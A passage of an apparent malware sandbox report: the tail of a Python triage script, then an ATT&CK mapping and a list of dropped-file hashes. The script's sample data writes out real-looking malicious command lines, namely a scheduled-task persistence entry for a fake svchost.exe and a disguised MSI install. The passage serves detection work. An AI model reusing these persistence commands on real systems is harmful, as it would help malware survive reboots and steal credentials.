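         r'/tr "C:\Users\Admin\AppData\Roaming\SubDir\svchost.exe" /rl HIGHEST /f',
         TMP + r"\adada.exe"),
    Proc(7412, r"C:\Windows\System32\msiexec.exe",
         r'"C:\Windows\System32\msiexec.exe" /i '
         r'"C:\Users\Admin\AppData\Roaming\DirectX11\em_TaWHWZA1_installer_Win7-Win11_x86_x64.msi.msi"',
         TMP + r"\dropperrr.exe"),
    # Two lines from the same tree that must stay quiet, as controls.
    Proc(7224, r"C:\Windows\system32\msiexec.exe", r"C:\Windows\system32\msiexec.exe /V"),
    Proc(2636, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
         r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility '
         r"--utility-sub-type=network.mojom.NetworkService --lang=en-US",
         r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
]

if __name__ == "__main__":
    for pid, rule, detail in triage(SAMPLE):
        print(f"PID {pid:>5}  {rule:<32} {detail}")
```

The rules are deliberately narrow (parent in a user-writable path, three or more miner flags, ONLOGON plus a user-profile target) so that Chrome's and Edge's own flag-heavy child processes in the same tree produce no findings; feed it any export that gives image path, command line and parent image per process.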
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Privilege Escalation
- Boot or Logon Autostart Execution (1): Registry Run Keys / Startup Folder (1)
- Scheduled Task/Job (1): Scheduled Task (1)
Credential Access
- Credentials from Password Stores (1): Credentials from Web Browsers (1)
- Unsecured Credentials (2): Credentials In Files (2)
Downloads
-
Filesize
2.5MB
MD5e70b307e33e856cc9cb70a59a32102da
SHA124b6d3e99b0e5ee94b7b591c40f7ac2b0ba6f555
SHA2568d7e591c16734d05b2b7d4b074a16ce05dc89d904d63e6de9add91aaeef4cccd
SHA5120c59c31f54214c1875a9314f689346c4755371bfbbfd245f3c90a00cd32b3ff8a378fdcd1b4fd597a956b39d310e3b31993103990166013ff5c61c15e63aa50b
-
Filesize
264B
MD54c447d9a22a239031d1d821acdaef00f
SHA1de4ce15414eb958efabff7f0f4c5128b87e67dea
SHA256ad99e7a6e98824b51a3bf956abae449c5db8b6bc313558901c65fc74a3517386
SHA512f4e496c69a2f3e4e3389f845dcffed5f443e1a94e96fa9da3dccf103df3941a970dbca7dfa1bcea57c3dc75c7a8e2b990b5fd5996d7fe919edd4db3a85013ca6
-
Filesize
3KB
MD5b40dc8cb2b240002ad52493e03510f3c
SHA110f1ce164c4799cc09e7f51d2127e722b5afb486
SHA256a8ad89b39df780eb2dab94f3abb5f28661e0a5bbbd7dc4889558f92945f2e1cc
SHA512779be83187b521f40104bd57e6fb5c3cdd8458eaeb93962c89248399392d8de48c520c1d8e55e188795bea44498007329e74961521754653417403406fa4d606
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
356B
MD53eba211daa81e6b79b6679845da69161
SHA16a5444f93a463bc30acf17e29e6d8168c62dd2e4
SHA25669e19a1df06edf6270dfe05ea0476ec4946be7bf31fc7fda7aa64217c02806cd
SHA512fa891ac204265be07800cea429721dd6751b1c39c9ea400271d189694eafebcc8c1de02596960f2207c82055521ee139f78b01abb38870c918541c9a5d0354f1
-
Filesize
8KB
MD5321a0fcc8d657654dfc62ce9032c5439
SHA1e6d8a6f358f8ff673a5cafd4d269c4887fe4b830
SHA25650f6f3f385da909806a38d36d0f2dbb150b1d9ff03fdb3c31c25540b68a05711
SHA512d036cd1b59497752f98b59b11f26f9e56650abc323ad390735f037c59acfb6b315c6a9d4a8013dd91446befe61dca70d492da7d42bdd8e335f63fcc9bc2015f0
-
Filesize
8KB
MD5523188d0fd86b4419a66c95d8028ea86
SHA11d4fc31b178d9fb334792eef8f092f3ffac6df2d
SHA256da7caddba65ef198a001dd754e04a6b9f014a58ca0abd2f70afc0c96a4ce201c
SHA512f4bf533c09b12433c16ae0de93aa633f2c20bce535c538b2598ec1244b2fffb209444550497f91d35a643d6032dc3c519568744a46b462f7259e1454651d262f
-
Filesize
8KB
MD53b55f4262dae7076b2368da9fafc403c
SHA1347a2c34f741dcfa0377d57b1bb45dce049add51
SHA256ae7344dc1b14ad5fa15165ced8becbc3dd59715715d722983f352682b8cab255
SHA512d727ee825ea6ae3307eaf9a1a2e36c5c3fc9ba5dc0b333538de0c64bfc1b1532f509eef27790a66d2d885a96108036d6dbf5681e2df3ea2ddd39817668260e6f
-
Filesize
8KB
MD5e58d5621e7ea63f97d08b3396998978d
SHA18a38560bb0f313c8405596468db086744aae29a5
SHA256f8f7a9f497b4f5c3bc3af271fe489a867570f4197fc732413d9fbe43439d0a83
SHA512a4e9daf7f5aa272e29377cbfe53ccefe08f0c6db7a3083225b3d8b82101c9c8c15229fe54ef0cb01a7c6649fa04ae0c441753582c5fca9365f4c23bf3853eb73
-
Filesize
8KB
MD55c84ad7c6a698656e2cac4247bac6cb8
SHA1556365880dd46ec1efc40d240058ab267d0ad53d
SHA2565c39a03cc2269466ba6cfd3a7cf5b4169ea913f15aed700796d146c1ea687a8e
SHA512d9865fe640ebd2e6fbf6eec1c615e84fab643c7566217552580ea7fb185451811e1b327dc5293f57c7196a9bcdc75b504c4cb6045edb09a93236f3c0452e7f37
-
Filesize
8KB
MD5ae31a3fffad542668f2ad22ff7cdfc13
SHA1456a50eec327af38e773fbb2e2a529c4f8b7056d
SHA256df709bd437b3dd3076ba0f8b92f67bb9a64a6fb7c1158bc2ce2a26ab71d7808a
SHA512f9a588b1085265f0863235dcadf2c963412bda872491e675bfb4110f14f00b85e87f23517a3769f9cfabefff9b9aa62c885f41bfdf7a36ba3e5c70b68b0d617f
-
Filesize
8KB
MD525155ac5d0540605ee10a74364f15e6c
SHA1cfa951247cfc760a92218f1045d3baed417e3750
SHA25617245cc4d9397154bf533178ac8ab2b2394d373928c7cfff4e59a569dd37db44
SHA5127e94110dda6081093e7d9f739b8dc856e3ff5a85c177254047274c9efb6fd2a8ebdd6fd0d1418c92d2b42afdf280cd1b48aeb6536f636cc0f2f8ba4b445a1590
-
Filesize
8KB
MD5305dcaa4e1b55e14502f94afa8f88db1
SHA14d1d535fa6e2c09b6cc398896e93cc98dbb507da
SHA2564666f7752e3c5285799733d61e087dc79604a48a1d216d34178756f5332fbe50
SHA512df5a2f530a2fdfda7faee866610900e1887773605f4626cae7e4b7aad122429124a94821ccac85647a84e01a006a4a807efaadd24eb16d78611ba8b4ae92a2a8
-
Filesize
8KB
MD5a9f98e0a70490bae6ce86f3dfe1d88b9
SHA14b949b1341dbadd0354b141f46b953dc2621a67e
SHA25693e2b123ece5e240f2285c08241508c8d25d29927eaad4a26a8d58ec2b18f05f
SHA512ecd3a1f3fc4988cee1da7d889125493631e2a3f4d94da330ad28c0eff00084b3c60caafe6a39041bc53836d82eb5bd330dfbedc06cc2ed87f2e4b15b630591cf
-
Filesize
100KB
MD59d8989dfa2cdd08624a9e2703e51b570
SHA142041fe7b7a4888aba36198324e07a357f3c23e5
SHA25615cb1f7ce5aca4530572833178ad16bf3d3513e48398bee4463b74baf2651823
SHA512ae7b59886696bd29922bf5e6b035c5912e0b6e0c09de8b61673f924f3b4da0dff7f8389fa0097faae215375be0c8f248e46ba26d283da0253fd4ba05b745d295
-
Filesize
100KB
MD5e17da61e88d71438e011b9b2abef68a6
SHA121e8441e9dfc0ef2614ce7e1cc252dc3344c1ac3
SHA2567cb7783be2756a5c93652d7527a389f2e138d09807fe533761df73878840f837
SHA51291b17f17007ebc3afef67083ca08a9e0d43eadcfd0900cb56b3214cbb9d9a5056d6461b09dd4bbecf3956e23a12bd58666eb2b20d3eaeb3a472e268cf6182f9e
-
Filesize
152B
MD578d53c4ecb4f237a195804abc28ebb1e
SHA15b036abe11431d0c164cc5427aa7eaaa2d8d1580
SHA256b1ead24150c5c17d1e8cdfaa64b4395cb1b0872c6f4bb25eb8e024ba0e39c847
SHA51290c1e12b736dc1a644262a44141f4bd7eb5fe935249978d1ff083e39017652ab847107add5b5fbeec6318db181cd22a728938fba7c384c8023ed8e3c03e61496
-
Filesize
152B
MD58edf5aee848362b3fa4c7102382947c3
SHA10ca71672592fef3c37dbf92a155d747c927b433f
SHA25616594552785f10884854bf38d179c9c3d26d023a089180bfe5a3ceb03c395e6d
SHA512a8863cfcea01c05938edd34690db467f0d429f0598528f23392ca7e7233a9b2fe2eaf7b886ac965e22e8c63ee79af84654e5b2f7e94033e5f54622f7b9584893
-
Filesize
33KB
MD560b8b39a48e099a79b96aa1cc1e0cfc4
SHA1fdf8cae154235a990f757624591ec05b3891ac26
SHA256cb5000e7cd62ab7f1fe45f8eb4ce9c4187f7b211436fa7dfb3aa2fef44400854
SHA5120976939732ffc39a891c13248508fb2473c402a0f83cd1abde02db00c71404ae442537f71b596e6ac64e91f16a9f15d49f3af583d60f87812dd0916468534b58
-
Filesize
38KB
MD58ad98b9733d7cb5dba046cb0622b8623
SHA1ac19b48fcd3bd8d632b9c8b654fe6349d2eba513
SHA256d1a0b50df2150a0ac812bbdbb3a61f4f85dc9c226ec918464bf6d51e4a6ccc2d
SHA51265f7befc24a499d72b07ceef592e49ba3c7b8a55a5c4b651e7fdaad61418bd8167b1950faef7c275bea997dde94b25461f1fd5000985d7a19f38cc75907a37e8
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize216B
MD510b060dcfef3a269e7aeec61b0471cf5
SHA170d36d4a6661b4323d5325806cfdb65146c0c963
SHA256fdf66cb731db3a5ebfb89e82e65390649c00bf851aacd85bcac443f4ed9ef031
SHA5123182ad8e8b34d774ae15dab2b193227b8b06bd317bce3fce81b56daedc35d927cd813cbd35ca69ab8005e1de171dc0ae7e5fc40c9f8521c493d42a2ea0f6b051
-
Filesize
1KB
MD5e37d6ca34d98b0d73e2a45e7449ba464
SHA184cc433461212b1aecc8dba51c7d4b33850bdc30
SHA256e6572bfe229c4946ee4595f04075f4e8aef4b2c80673d810cf6f277fa7a21e11
SHA5128527ccc78e52c3d15a828e26a7a037cda40517e752fd981fe159a9c72f0bb1da62ecee4a0f7755bfc2bd0b615228cc550d817de36fee56cc1921e81314c252eb
-
Filesize
6KB
MD5924aa76b0ca7012f88169d83f98c702a
SHA138fab8bce006523d9c015a635fd5e8dd3015d6d1
SHA256dad2a74805c73c49a73cde699fb1e643c4276d4fa7b7e86cd8e7f2c12ff10250
SHA512fbe68247db2a5cbb11f4157c96034cc108bdeff2420485e468b8e621b204a56e249070dede2ad6190cbd00cbc61bf6ec1a6b6e413e3da741958b00c865fa6964
-
Filesize
6KB
MD533d569b9cb69c4e96cfac66ed37b218b
SHA1279d256b6072e13f2f7ee3a5329a6bb5833a35ec
SHA2566e60a449929ab29e65622a612564d06c5dc7d2b5a23b2f8249b450b54a14332d
SHA5126ab73821763d9786111faf1d7ba89a7c24bc798b29f424c5d5d3222b2276913cbbf6640ffe2424a50bc3b41a93186fc3a956cece8083ef52155c838bb4eaea62
-
Filesize
10KB
MD5b4bcf8cf26bcba3a663577ecdcdf8387
SHA12f177504c8f41b607cc6e557232d4742cdcd1558
SHA2562eec18a1557728e4297be83686cc76d7c9af3dc7180ce1e86f5dfddad5a3587f
SHA512fa2bfcb1615f0c65ebed914ef0a18dc752e5f41969738309bfac8e0efad6f4e8f6f9976a70485f39f6aefb300ac77e20b377390e92d54381a997d1a40f822df2
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\99o3eutv.default-release\activity-stream.discovery_stream.json.tmp
Filesize19KB
MD5a3187051d56ac6abcedc95fec634cf1c
SHA17c67fb6c9896bf7d39e4e39f539b655acf85041c
SHA2565a348dd05ab10b891bfd023011f0c70e7a323a2ae064544b9c26a5d57b936c36
SHA512069d04b71eaf1def1e1b6070ea7bea73a9e15e9553e6451dfdd31af95e31b0b26c0f2e315d4664c7cbce3df03c937d3b98d4c64497b611b43e18b9d168a07121
-
Filesize
1.8MB
MD5c015c231f5d013a7031748f95129a969
SHA127f74431dbaa7b8bd16a5ddc0b871da65ea62849
SHA2560d558642cb8576c04cad2835209a1ee8ffd40061f985a8ba8ab4d4f45ada5ad4
SHA512baf6f0d3752e49ad769325bde85129d803094ea42e9d9735eafb3f415014e6d2f07a977d8892fef85307bc80e0060f0ef3c364ef3b6d05a0d4324956723a194e
-
Filesize
89KB
MD54b67af171faedf1786697467acdbc63c
SHA1b9bf249f79a7af45119326475533ab5fadd66b6b
SHA2561dab3f3893bd28640fb2baa2caa5ccc03de88400c03b01ca2a1697e2c9f51428
SHA512f5e7dfa827cd578dd0b4cc3f798c98ecc2081d214f7c04f70b82373ed54f9d1018435b54395b3a013b759bddb4dc1a9521cfcdd49c93be486af3d998e580265a
-
Filesize
1.8MB
MD5248d72640b5697bedb167b6922f7d9ec
SHA1232be32e0792a7308654b29f2001b4ece7c2dcbc
SHA2566ea68397c9ada660d60cd92137460f9ec823d57374a5ea490b834362d1641227
SHA512002d4f34ac151a89a9e778ca2f80d69572af44ff8c936ca8c2b383706d07598729b1908ed5f49921dd9fca9c4f920d5c2660cb8da2ad0514097dc7ad6291d571
-
Filesize
294KB
MD558ccb4c9da26dbf5584194406ee2f4b3
SHA1ae91798532b747f410099ef7d0e36bffeca6361c
SHA2562f502689b799fd964bced77e57edf4206809bb11da16cf4f7895df1df54cdc97
SHA512dff6b4bf25fc5b5cf1a64ee645fb0310b072ec69c89a6e863cf9e0800e1d36f8dc4e567cf19c7dc8ac704d351b604cbf8d35959c3a64a10aa6b54f5c8fedb3c2
-
Filesize
2KB
MD5de9423d9c334ba3dba7dc874aa7dbc28
SHA1bf38b137b8d780b3d6d62aee03c9d3f73770d638
SHA256a1e1b422c40fb611a50d3f8bf34f9819f76ddb304aa2d105fb49f41f57752698
SHA51263f13acd904378ad7de22053e1087d61a70341f1891ada3b671223fec8f841b42b6f1060a4b18c8bb865ee4cd071cadc7ff6bd6d549760945bf1645a1086f401
-
Filesize
3.1MB
MD59c682f5b5000cd003e76530706955a72
SHA11a69da76e05d114a317342dae3e9c7b10f107d43
SHA25636e6a3dd4bfc86c4e707f43cd9515707442d6c424b7661cb41766cfdca322522
SHA51233bd859542e1ae74d8c81427af44022cb91861dc02ee4202505f1e010487d06cb27e1aa83be6af17be4e2d8973289595b2ebe9bdf99a187956662df30b6dc88f
-
Filesize
476KB
MD535e7f1f850ca524d0eaa6522a4451834
SHA1e98db252a62c84fd87416d2ec347de46ec053ebd
SHA2562449fe334bbf8f09ff80422578a6c6961d20a0a456b214f6490c5ed1ae859c9e
SHA5123b013378a51a29652ff84f61050b344f504ef51a51944d469b1d0e629e4abad979416a56b9cffb6cfe20b80dfbebffec35dce6f5dc10b02907dee538f9f17a01
-
Filesize
662KB
MD50006ad7b9f2a9b304e5b3790f6f18807
SHA100db2c60fca8aec6b504dd8fd4861a2e59a21fe9
SHA256014d6c58dd7459c1664196ccd49b796f861d7d7e7e6c573bbb9cdc7cadc21450
SHA51231fcde22e25be698ef2efd44cc65b758e8c9e8b62504f3254f9cc44bfaabdaa0c94cefceac12833372f8b2797b6bd0205bb9c8f1626e25ee4117d886198fb7db
-
Filesize
40KB
MD5a182561a527f929489bf4b8f74f65cd7
SHA18cd6866594759711ea1836e86a5b7ca64ee8911f
SHA25642aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914
SHA5129bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558
-
Filesize
114KB
MD5f11ec78dc3d97887a7f5c1cf47c39b72
SHA1da02b1888d4dc2368df60eb57d630efc7f794f78
SHA2565b1cf0211d5ab69d725bbbd618b9a5f204f10cee268858dd8299d73c1044356f
SHA5124360ba61e2189493f2cc422789277dd3d3b3ac6dda2e6fc61d15b1b64423b39e2e4d6b84d2eaa6fbb6575ec969c1fd17659b9e63d76db734eb67675b30060bd1
-
Filesize
48KB
MD5349e6eb110e34a08924d92f6b334801d
SHA1bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA5122a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574
-
Filesize
20KB
MD549693267e0adbcd119f9f5e02adf3a80
SHA13ba3d7f89b8ad195ca82c92737e960e1f2b349df
SHA256d76e7512e496b7c8d9fcd3010a55e2e566881dc6dacaf0343652a4915d47829f
SHA512b4b9fcecf8d277bb0ccbb25e08f3559e3fc519d85d8761d8ad5bca983d04eb55a20d3b742b15b9b31a7c9187da40ad5c48baa7a54664cae4c40aa253165cbaa2
-
Filesize
116KB
MD5f70aa3fa04f0536280f872ad17973c3d
SHA150a7b889329a92de1b272d0ecf5fce87395d3123
SHA2568d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA51230675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84
-
Filesize
96KB
MD540f3eb83cc9d4cdb0ad82bd5ff2fb824
SHA1d6582ba879235049134fa9a351ca8f0f785d8835
SHA256cdd772b00ae53d4050150552b67028b7344bb1d345bceb495151cc969c27a0a0
SHA512cdd4dbf0b1ba73464cd7c5008dc05458862e5f608e336b53638a14965becd4781cdea595fd6bd18d0bf402dccffd719da292a6ce67d359527b4691dc6d6d4cc2
-
Filesize
479KB
MD509372174e83dbbf696ee732fd2e875bb
SHA1ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1
-
Filesize
13.8MB
MD50a8747a2ac9ac08ae9508f36c6d75692
SHA1b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA25632d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA51259521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\99o3eutv.default-release\AlternateServices.bin
Filesize 12KB
MD5 69eeb2b873f813701224bc955abcca90
SHA1 e472038745bb2fb36991384519a1a11256fad7f6
SHA256 f91b7bb176bc13cd7614058f580f386246eec64d79badc2b2ef978f998ce25b7
SHA512 92ccaa4c95e17f0730014c96aa570949feee90b36d9d6e969c9a588cf1920767660936546c6cdea73131dc1d3ab9c6e892bff8b7c53c7b34083a17061f247fb6
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\99o3eutv.default-release\AlternateServices.bin
Filesize 12KB
MD5 783d4724c9e8d460d016dc6372365434
SHA1 15d7708aefe1d62b8230de1f6f08ccc788d85b63
SHA256 78230a1c7a9f8e2a7020360abd81d967bcac885c9e95ca05278fc279d426057a
SHA512 a69c494fabf72c55499b7c1f1e70fecb108c44b4b100271b7e771d63e9445229ea250fca21f28a367102a18f1b439a2f5adc40001b844b56dced78297ec9d61f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\99o3eutv.default-release\datareporting\glean\db\data.safe.tmp
Filesize 34KB
MD5 b10a50d634594668233662f4de0c8807
SHA1 4d77308d095dad53fcbb2ad2056beca2bac9cf48
SHA256 e04e406ed39d5ae88aa2d72dd38e277f2ed8b7fa9e93216aff9dc1ac871b381f
SHA512 456276d9cdae1a9a16dcaeb2d87c6a5769b3eb2afbca0a84e1c008dd81e70f9ae3a383f9c10b972c3ec586ec9599956fff3d619574b1370af417ec67c30b10b7
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\99o3eutv.default-release\datareporting\glean\db\data.safe.tmp
Filesize 22KB
MD5 add9b89a856e891f491535838467926c
SHA1 8da7dd5353d425ff979d9275d7f1bb96db2dfd54
SHA256 5fdca7c90197c2b957d0851989695f95f0527579d0326a5a9a3a1518f0957c3e
SHA512 5930a975800b2ea04e7274cd69b497bfa8b12f61becff415f0941cfd4e0d972d072ff131915d3f27a139883efbd8b4c7b4a7830c5fbfa094b4aa8616921c8de8
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\99o3eutv.default-release\datareporting\glean\db\data.safe.tmp
Filesize 23KB
MD5 7727716a5627052c27f26410609c5aaf
SHA1 bb7a9a648b05ac407e37d581ecf138dd03e58070
SHA256 088ef036efc569072c89dc06647e9139ee428d362fb85d818182dfc1616cf49b
SHA512 68063c4bbd816a425000d6acad70a192d65080b92e679f9ce7a6284ed4b0553a22859b3800482209a1303cf4e5d90c3736c19ab9d40be5486dfd398edc3e28fc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\99o3eutv.default-release\datareporting\glean\pending_pings\da4aace6-cac7-4888-95ac-f55743e2ba0e
Filesize 659B
MD5 c1b2575d9a77e32b8624eb63ce1acf33
SHA1 e458a17e2ec369821938615ccaf0b0bed8445cb7
SHA256 47010e7fd9bc931b3b264c3d1c3030e4c69f5b539358de636799a163fa040407
SHA512 9540e8e52332a07bf2b689f769634edd56e84111532db02c684adc713a3692d02a3799545d2f4f63b355373d4e8e71bfa059b6c9344087b2bdefa78aa7203cf3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\99o3eutv.default-release\datareporting\glean\pending_pings\f1e5ba4d-8b3b-41e2-8819-c17484304293
Filesize 982B
MD5 2cc068bda5f96603531f8ab25357eb86
SHA1 edd4accb5e5846287fd2a7d72627375296e0e8a1
SHA256 05776cf1a9b79c7b1a6cbc24451607731fb0f6b8ab0cc9952ef74fa596af408f
SHA512 fa016e1ccdd91a23fe276a7ca1649d36adf049ef5955b5c1f0cb0d5f12dad48656086eba1431e61a1e3925bc31adc79e53fbe2130e374c73651e5af638f8e67f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\99o3eutv.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll
Filesize 1.1MB
MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\99o3eutv.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info
Filesize 116B
MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\99o3eutv.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json
Filesize 372B
MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\99o3eutv.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll
Filesize 17.8MB
MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75
-
Filesize 10KB
MD5 1e64d6f25e6ce8065d75f8a7bd18523f
SHA1 26a1acce0cb607e42f0b01376717b9102e467af1
SHA256 120df4a884aaaef867694e59a21bfe513b0e96a4887479dff2c87aa0505c5562
SHA512 71f1284e7d79bea980d15b00a97ffd15da308ad68410fa463ccd93afb25ff99bef97d93542986dc029b959e17b54eb3cc694a1d5ca411d6c1c236a2ec66026f5
-
Filesize 11KB
MD5 69c35dd4fa97ff5de49f3616cd112c4f
SHA1 488d5c95d7752a2050523981cbe489758d158449
SHA256 fd1dcdafe9f7f2e09f798ad9436b748f52b0e186862c2bad04d9b006a1ef2e64
SHA512 781dbf2ed51a224c6d4e58d500289b475a0aa28bc5b0333237dbba81753a4f37d686a5495f4abb88a7fe66be4bceaed59ce34abf9556c6b1b32574ada0b2852c
-
Filesize 10KB
MD5 d5b665dc9bf5e2e5a4245ddefd882cee
SHA1 d89fb0b56345e93e719ab458ff2b915464822966
SHA256 0784f5cc0954f1ee3a4fc1b004b290adf94ce15f7f4d0b51bdb1d081cd7462f7
SHA512 90c98224ab3d3a17e636ba9278c823b56c16693097f3488ae7f34afad8a7e1ff720f692f1ac357d8a9f3e1a162297bbbb2860a55e8d92c600e14e08d58963f74
-
MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
(These four values are the well-known digests of a zero-byte input, so this entry records an empty file and is not a usable indicator on its own.)